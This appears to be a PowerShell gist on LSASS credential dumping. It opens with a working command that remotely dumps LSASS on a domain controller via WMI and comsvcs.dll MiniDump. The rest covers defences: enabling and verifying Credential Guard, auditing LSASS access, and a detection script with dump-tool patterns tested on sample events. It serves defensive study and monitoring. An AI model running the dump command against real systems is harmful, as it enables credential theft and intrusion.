Ghost Ghost-Developmentx
# Remote execution using WMI: dump LSASS on a remote host with comsvcs.dll MiniDump
# Needs local admin on the target (MiniDump uses SeDebugPrivilege); the PID (652 here)
# must be lsass.exe's PID on the target, so it is normally resolved first rather than hardcoded
$target = "DC01.contoso.com"
$cred = Get-Credential
# Create remote CIM session (WS-Man/WinRM by default; add
# -SessionOption (New-CimSessionOption -Protocol Dcom) for classic WMI over DCOM)
$session = New-CimSession -ComputerName $target -Credential $cred
# Execute remote dump: Win32_Process.Create spawns rundll32 on the target, so the
# command line lands in 4688 there if command-line auditing is on
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{
    CommandLine = 'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\lsass.dmp full'
}
Remove-CimSession $session
# Enable Credential Guard (requires restart)
# Requires: Windows 10 Enterprise/Education, Windows 11, Server 2016+
# Hardware: UEFI with Secure Boot, 64-bit CPU with virtualization extensions and SLAT; TPM 2.0 recommended for key protection
# Enable VBS via registry (RequirePlatformSecurityFeatures: 1 = Secure Boot only, 3 = Secure Boot + DMA protection)
New-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
    -Name "EnableVirtualizationBasedSecurity" -Value 1 -PropertyType DWORD -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
    -Name "RequirePlatformSecurityFeatures" -Value 3 -PropertyType DWORD -Force
# The DeviceGuard values only turn on VBS; Credential Guard itself is switched on with LsaCfgFlags
# (1 = enabled with UEFI lock, 2 = enabled without lock; the lock stops it being disabled remotely)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
    -Name "LsaCfgFlags" -Value 1 -PropertyType DWORD -Force
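Setting the registry values only records intent; after the reboot the state that matters is what VBS reports. The check below is an added example, not code from the gist: it reads Microsoft's `Win32_DeviceGuard` CIM class (namespace `root\Microsoft\Windows\DeviceGuard`) and the `LsaCfgFlags` value, and warns when Credential Guard is configured but not actually running. The function name `Get-CredentialGuardState` and the output layout are this example's own choices; it runs locally only.

```powershell
# Added example (not from the gist): confirm Credential Guard is running, not just configured.
# Win32_DeviceGuard fields used here:
#   VirtualizationBasedSecurityStatus: 0 = off, 1 = enabled but not running, 2 = running
#   SecurityServicesConfigured / SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI
#   RequiredSecurityProperties / AvailableSecurityProperties: what VBS needs vs what the platform offers
function Get-CredentialGuardState {
    [CmdletBinding()]
    param()

    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard

    $vbs = switch ($dg.VirtualizationBasedSecurityStatus) {
        0       { 'Off' }
        1       { 'EnabledNotRunning' }
        2       { 'Running' }
        default { "Unknown($_)" }
    }

    # LsaCfgFlags is the Credential Guard switch: 1 = on with UEFI lock, 2 = on without lock, absent/0 = off
    $lsaCfg = (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
                -Name LsaCfgFlags -ErrorAction SilentlyContinue).LsaCfgFlags

    [pscustomobject]@{
        Computer                  = $env:COMPUTERNAME
        VbsStatus                 = $vbs
        LsaCfgFlags               = $lsaCfg
        CredentialGuardConfigured = [bool]($dg.SecurityServicesConfigured -contains 1)
        CredentialGuardRunning    = [bool]($dg.SecurityServicesRunning -contains 1)
        HvciRunning               = [bool]($dg.SecurityServicesRunning -contains 2)
        RequiredProperties        = $dg.RequiredSecurityProperties
        AvailableProperties       = $dg.AvailableSecurityProperties
    }
}

$state = Get-CredentialGuardState
$state | Format-List

# Configured-but-not-running usually means no reboot yet, or a required platform
# property (Secure Boot, DMA protection, ...) that the hardware does not provide.
if ($state.CredentialGuardConfigured -and -not $state.CredentialGuardRunning) {
    Write-Warning ("Credential Guard is configured but not running on {0}; compare RequiredProperties {1} " +
                   "with AvailableProperties {2} and reboot." -f $state.Computer,
                   ($state.RequiredProperties -join ','), ($state.AvailableProperties -join ','))
}
```

Run it elevated after the restart; `CredentialGuardRunning` must be true for the LSASS dump above to yield only encrypted blobs instead of reusable secrets. A missing number in `AvailableProperties` that appears in `RequiredProperties` is the usual reason a correctly written registry configuration never takes effect.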
# Enable audit policy for LSASS access attempts ("Kernel Object" is what produces 4656/4663 for handle
# opens on the lsass process; "Sensitive Privilege Use" gives 4673/4674 for SeDebugPrivilege use)
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable
auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable
# 4688 carries the process command line only when ProcessCreationIncludeCmdLine_Enabled is set (key may not exist yet)
$auditKey = New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Force
New-ItemProperty -Path $auditKey.PSPath -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force
# Create scheduled task to monitor LSASS access (4656/4663 only appear with "Kernel Object" auditing enabled)
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument @"
-NoProfile -WindowStyle Hidden -Command "
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4656,4663} |
Where-Object {`$_.Message -match 'lsass.exe'} |
ForEach-Object {
    # per-event handling is cut off in the source; appending to a log file is an assumed placeholder
    Add-Content -Path 'C:\Windows\Temp\lsass-access.log' -Value ('{0} {1}' -f `$_.TimeCreated, `$_.Message)
}"
"@
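Matching `lsass.exe` anywhere in the message text is noisy: it fires on every audit line that mentions the binary, and it ignores the one thing that separates a credential dump from ordinary system activity, the requested access mask. The script below is an added example, not code from the gist, covering both the dump command used in the WMI snippet and the handle-open events the scheduled task above polls. It parses the tab-separated fields of Security event messages, flags 4688 command lines that match known dump tools and 4656/4663 handle requests on the lsass process with the access masks dumpers ask for, and runs offline against constructed sample events. Function names (`Get-MessageField`, `Test-LsassDumpIndicator`, `New-DumpAlert`), the pattern list, the mask list and the sample events are this example's own assumptions.

```powershell
# Added example (not from the gist): detection logic for LSASS dumping over Security events.
# Feed it Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688,4656,4663} in production;
# here the events are constructed inline so the script runs offline.
# Caveats: 4688 carries the command line only with ProcessCreationIncludeCmdLine_Enabled set, and
# 4656/4663 for the lsass process need the "Kernel Object" subcategory (Sysmon Event ID 10 otherwise).

# Access masks commonly requested when a tool opens LSASS to read its memory
# (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION and supersets, up to PROCESS_ALL_ACCESS).
$SuspiciousAccessMasks = @('0x1010', '0x1410', '0x1438', '0x143A', '0x1FFFFF')

# Command-line patterns for common dump methods (-match is case-insensitive).
$DumpCommandPatterns = @(
    'comsvcs\.dll.{0,30}MiniDump'             # rundll32 comsvcs.dll, MiniDump <pid> <file> full
    'procdump(64)?(\.exe)?\s.*-ma\s.*lsass'   # Sysinternals procdump -ma lsass
    'lsass\.dmp'                              # dump file name used in the snippet above
)

function Get-MessageField {
    # Extract "<Field>:<tab>value" from the multi-line message body of a Security event.
    param([string]$Message, [string]$Field)
    $pattern = '(?m)^\s*' + [regex]::Escape($Field) + ':\s*(.+?)\s*$'
    if ($Message -match $pattern) { return $Matches[1] }
    return $null
}

function New-DumpAlert {
    param($Record, [string]$Reason, [string]$Detail)
    [pscustomobject]@{ Time = $Record.TimeCreated; Id = $Record.Id; Reason = $Reason; Detail = $Detail }
}

function Test-LsassDumpIndicator {
    # Emits one alert object per suspicious event; benign events produce nothing.
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        switch ($Record.Id) {
            4688 {
                $cmd = Get-MessageField $Record.Message 'Process Command Line'
                if ($cmd) {
                    $hit = $DumpCommandPatterns | Where-Object { $cmd -match $_ } | Select-Object -First 1
                    if ($hit) { New-DumpAlert $Record "command line matches '$hit'" $cmd }
                }
            }
            { $_ -in 4656, 4663 } {
                $obj  = Get-MessageField $Record.Message 'Object Name'
                $mask = Get-MessageField $Record.Message 'Access Mask'
                $proc = Get-MessageField $Record.Message 'Process Name'
                if ($obj -like '*\lsass.exe' -and $mask -in $SuspiciousAccessMasks) {
                    New-DumpAlert $Record "handle to lsass.exe requested with access mask $mask" $proc
                }
            }
        }
    }
}

# Constructed sample events shaped like Get-WinEvent output (Id, TimeCreated, Message).
$SampleEvents = @(
    # 4688 for the exact dump command used in the WMI snippet
    [pscustomobject]@{ Id = 4688; TimeCreated = [datetime]'2024-05-01T10:00:00'; Message = (@(
        'A new process has been created.'
        'Process Information:'
        "`tNew Process Name:`tC:\Windows\System32\rundll32.exe"
        "`tProcess Command Line:`trundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\lsass.dmp full"
    ) -join "`n") }
    # 4656: rundll32 asking for a read handle on the lsass process object
    [pscustomobject]@{ Id = 4656; TimeCreated = [datetime]'2024-05-01T10:00:01'; Message = (@(
        'A handle to an object was requested.'
        'Object:'
        "`tObject Type:`tProcess"
        "`tObject Name:`t\Device\HarddiskVolume3\Windows\System32\lsass.exe"
        'Process Information:'
        "`tProcess Name:`tC:\Windows\System32\rundll32.exe"
        'Access Request Information:'
        "`tAccess Mask:`t0x1410"
    ) -join "`n") }
    # Benign: an ordinary process start and a file-object audit with a broad mask but no lsass
    [pscustomobject]@{ Id = 4688; TimeCreated = [datetime]'2024-05-01T10:00:02'
        Message = "A new process has been created.`nProcess Information:`n`tProcess Command Line:`tnotepad.exe C:\Users\alice\notes.txt" }
    [pscustomobject]@{ Id = 4663; TimeCreated = [datetime]'2024-05-01T10:00:03'
        Message = "An attempt was made to access an object.`nObject:`n`tObject Name:`tC:\Finance\budget.xlsx`nProcess Information:`n`tProcess Name:`tC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE`nAccess Request Information:`n`tAccess Mask:`t0x1FFFFF"
)

$alerts = @($SampleEvents | Test-LsassDumpIndicator)
$alerts | Format-Table -AutoSize
```

The two constructed malicious events are reported and the two benign ones are not, because the 4656/4663 branch requires both the lsass object name and a memory-read access mask rather than a substring match on the message. When wiring this into the scheduled task, replace `$SampleEvents` with a `Get-WinEvent` call bounded by `StartTime` so each run only examines events since the previous one.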